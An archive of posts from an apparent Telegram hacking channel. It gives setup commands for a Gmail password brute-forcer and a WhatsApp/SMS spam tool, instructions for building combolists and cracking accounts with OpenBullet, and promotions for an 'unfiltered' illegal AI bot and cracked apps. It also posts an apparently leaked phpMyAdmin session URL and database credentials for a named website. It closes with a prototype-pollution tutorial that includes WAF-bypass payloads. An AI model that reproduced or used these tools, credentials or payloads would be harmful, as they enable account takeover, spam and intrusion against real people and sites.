INDCRYPT
Kanalga Telegram’da o‘tish
🚩 Channel was restricted by Telegram
Ko'proq ko'rsatishMa'lumot yo'q
Obunachilar
-1224 soatlar
-197 kunlar
+430 kunlar
Postlar arxiv
📢 Illegal AI Bot is Now Live!
🔹 Introducing @IllegalAI_bot – your ultimate AI-powered assistant with unrestricted capabilities!
🔥 Features:
✅ Advanced AI Responses
✅ Unfiltered & Powerful
✅ Available 24/7
💀 Join now & experience the future of AI!
👉 Try Illegal AI Now
A tool to brute force a gmail account. Use this tool to crack multiple accounts.
apt install python3
git clone https://github.com/Cyber-Dioxide/Gmail-Brute
cd Gmail-Brute
chmod +x *
python3 crack.py
Enter path of mail list
You can use defaul wordlist (passwords)
Use of defaul proxy is not recommended
First of all create a new file email.txt and add your emails for cracking inside Gmail-Brute folder Now start the tool from above usage commands Put email file for 1st option, next it is asking for wordlist. Due to large file size, developer removed default wordlist so we will have to add our own. These are not default proxies that i'm using, i have edited all the default proxies that's why i presses 'n' for proxy option, otherwise add path if you press have a nice day...
#Only for educational purposesFor more :- clickme
Script Spam Whatsapp Sms Terbaru WITH TuToRIaL
pkg update && pkg upgrade
pkg install python
pkg install python-pip
pkg install git
git clone https://github.com/Dra-Ganzz/NewsSpam
cd NewsSpam
pip install -r requirements.txt
git pull
python run.py
Script path
cd Spm-Whatsapp
ls
git pull
python run.py
⚠️Termux tools are for educational use only. For more information about this tool, visit the GitHub link.━━━━━━━━━━━━━━━━━━━━━━ 📌 𝗣𝗶𝗻 𝗼𝘂𝗿 𝗰𝗵𝗮𝗻𝗻𝗲𝗹 𝗴𝗲𝘁 𝗮𝗹𝘄𝗮𝘆𝘀 𝗶𝗻𝘀𝘁𝗮𝗻𝘁 𝘂𝗽𝗱𝗮𝘁𝗲 👨💻 ━━━━━━━━━━━━━━━━━━━━━━━
Share with proper credit else gay🔹 𝐒𝐡𝐚𝐫𝐞 & 𝐒𝐮𝐩𝐩𝐨𝐫𝐭 𝐔𝐬 🔹 📱 𝐂𝐡𝐚𝐧𝐧𝐞𝐥 : 𝐜𝐥𝐢𝐜𝐤 𝐡𝐞𝐫𝐞 𝐆𝐈𝐕𝐄 𝐑𝐄𝐀𝐂𝐓𝐈𝐎𝐍𝐒 𝐅𝐎𝐑 𝐌𝐎𝐑𝐄 𝐒𝐔𝐂𝐇 𝐂𝐎𝐍𝐓𝐄𝐍𝐓𝐒 🎁
play a safe and joyful holi! respect everyone, especially women—no harm, no force, just colors and happiness. celebrate with love, laughter, and family. let’s keep the spirit of holi alive with peace and positivity. 🌸🎨💜 from team hacking vidhya. #playsafe #holicelebration #spreadlove
🔥 How to Create Combolists & Crack Like a Pro 🔥
🔵Run all tools on an RDP/VM for safety.
🔵Collect usernames and passwords from reliable sources.
🔵Format combos as email:password or user:pass.
🔵Test with tools like OpenBullet and ensure proxies are used.
#paid but free for you━━━━━━━━━━━━━━━━━━━━━━ 📌 𝗣𝗶𝗻 𝗼𝘂𝗿 𝗰𝗵𝗮𝗻𝗻𝗲𝗹 𝗴𝗲𝘁 𝗮𝗹𝘄𝗮𝘆𝘀 𝗶𝗻𝘀𝘁𝗮𝗻𝘁 𝘂𝗽𝗱𝗮𝘁𝗲 👨💻 ━━━━━━━━━━━━━━━━━━━━━━━
Share with proper credit else gay🔹 𝐒𝐡𝐚𝐫𝐞 & 𝐒𝐮𝐩𝐩𝐨𝐫𝐭 𝐔𝐬 🔹 📱 𝐂𝐡𝐚𝐧𝐧𝐞𝐥 : 𝐜𝐥𝐢𝐜𝐤 𝐡𝐞𝐫𝐞 𝐆𝐈𝐕𝐄 𝐑𝐄𝐀𝐂𝐓𝐈𝐎𝐍𝐒 𝐅𝐎𝐑 𝐌𝐎𝐑𝐄 𝐒𝐔𝐂𝐇 𝐂𝐎𝐍𝐓𝐄𝐍𝐓𝐒 🎁
🔥 eJPT Certificate Voucher Available! 🔥
🚀 Get your eJPT voucher now for just ₹6500! 🚀
💻 Boost your cybersecurity career with the eLearnSecurity Junior Penetration Tester (eJPT) certification.
🔒 Validate your ethical hacking skills and take your career to the next level!
⚡️ Limited stock available! DM @stexe to grab yours today! ⚡️
🔥 Best SX.org Proxy Service – Get 30% OFF! 🔥
Looking for the best proxy service? SX.org provides high-speed, reliable, and secure proxies for all your needs. Whether it’s web scraping, anonymity, or bypassing restrictions, SX.org has you covered!
💥 Limited-Time Offer: Get 30% OFF using code HACKING-VIDHYA30 at checkout! 💥
🔹 Fast & Secure
🔹 High Anonymity
🔹 24/7 Support
Don’t miss out on this exclusive deal! Grab your discounted proxies now and experience the best performance.
👉 Visit SX.org & use HACKING-VIDHYA30 today! 🚀
🚀 Live Session on Android Hacking! 🔥
📅 Date: Sunday (Today)
⏰ Time: 2 PM IST
🎯 Topic: Android Hacking & Security Analysis
What you'll learn:
✅ Dynamic & Static Analysis
✅ Android App Hacking Techniques
✅ Hands-on with Tools: Frida, MobSF, Objection & more!
Don't miss out! Join us and level up your hacking skills. 🔥
🚀 Live Session on Android Hacking!🔥
📅 Date: Sunday (Today)
⏰ Time: 2 PM IST
🎯 Topic: Android Hacking & Security Analysis
What you'll learn:
✅ Dynamic & Static Analysis
✅ Android App Hacking Techniques
✅ Hands-on with Tools: Frida, MobSF, Objection & more!
Don't miss out! Join us and level up your hacking skills. 🔥
https://www.numoucenter.org/phpmyadmin/sql.php?db=wordpress&token=bacc759342e6b182bebba2de0ff7fe76&goto=db_structure.php&table=nu_user_cards&pos=0
DB_HOST=localhost
DB_DATABASE=wordpress
DB_PORT=3306
DB_USERNAME=wproot
DB_PASSWORD=LetsEncrypt07
DB_TABLE_PREFIX= nu_
Don’t forget the reactions and stars⭐️!
They fuel my energy to post such contents🔋✨.
@hacking_vidhya
🚀 CRΔCKΞD WΘRLD 🔥
🔓 Unlock the Impossible | No Limits
💀 Premium Apps | Modded & Cracked
⚡ Power, Speed & Ultimate Access
🔗 Stay Hidden | Stay Unstoppable
⚠️ Only for Educational Purposes ⚠️
Access now :- click here
Prototype Pollution Vulnerability
Prototype Pollution is a security vulnerability in JavaScript that allows an attacker to add arbitrary properties to the prototype (the root object) of a general object. This enables an attacker to modify object properties that would typically be inaccessible.
However, this vulnerability alone is not always exploitable. To increase its impact, an attacker often combines it with other vulnerabilities like Cross-Site Scripting (XSS) to execute malicious actions.
━━━━━━━━━━━━━━━━━━
Understanding JavaScript Object Prototypes
In JavaScript, everything is an object. An object is essentially a collection of key-value pairs where values can be of any data type, such as boolean, string, integer, etc.
Creating an object in JavaScript is simple:
let userInfo = {
"username": "admin",
"password": "1qaz2wsx3edc",
"email": "admin@victim.com"
};
To access properties of this object, we can use two methods:
1-Dot notation:
userInfo.username;
Bracket notation:
userInfo["username"];
One of these methods is used for polluting the prototype of an object.
━━━━━━━━━━━━━━━━━━
How Prototype Pollution Works
When a property of an object is accessed, the JavaScript engine first looks for it inside the object itself.
•If the property does not exist in the object, JavaScript traverses up the prototype chain to find it in the parent prototype.
To better understand this, open the browser Console and create an object. JavaScript will automatically connect it to one of the built-in prototypes based on its type.
Example:
var name = "Arya";
console.log(name.proto);
Since "Arya" is a string, it inherits all properties from JavaScript's String prototype.
Using dot notation or bracket notation, we can see various inherited properties that were not explicitly defined.
Moreover, we can manually reference an object's prototype using:
a.proto;
Exploiting Prototype Pollution
If an attacker overwrites a property in a prototype that is being used in the frontend or backend of a web application, it can lead to serious security issues.
━━━━━━━━━━━━━━━━━━
Testing for Prototype Pollution
To test for Prototype Pollution, modify the URL as follows and send a request:
1️⃣ Dot Notation Approach
http://target.com/?proto.arya=arya
2️⃣ Bracket Notation Approach
http://target.com/?proto[arya]=arya
Bypassing WAF (Web Application Firewall)
If the WAF blocks the proto keyword, we can use constructor-based techniques:
/?constructor.prototype.arya=arya
/?constructor[prototype][arya]=arya
If the WAF still blocks requests, we can use nested obfuscation techniques:
/?proprototo[arya]=arya
/?proprototo.arya=arya
/?constconstructorructor[protoprototypetype][arya]=arya
/?constconstructorructor.protoprototypetype.arya=arya
Confirming
the Vulnerability
To check if the property was successfully polluted, create an empty object in the browser console and try accessing the polluted property:
let test = {};
console.log(test.arya); // Output: " arya"
If the property value appears, the Prototype Pollution vulnerability exists on the target system.
━━━━━━━━━━━━━━━━━━
Conclusion
Prototype Pollution is a powerful vulnerability that, when combined with other exploits, can lead to serious security risks. Understanding how JavaScript's prototype system works is essential for both attackers and defenders to identify and mitigate such threats effectively.
https://t.me/hacking_vidhya
#CyberSecurity #MSSQL #EthicalHacking
#PrototypePollution
#JavaScriptSecurity
#WebSecurity
#BugBounty
#EthicalHacking
#CyberSecurity
#SecurityResearch
#WebHacking
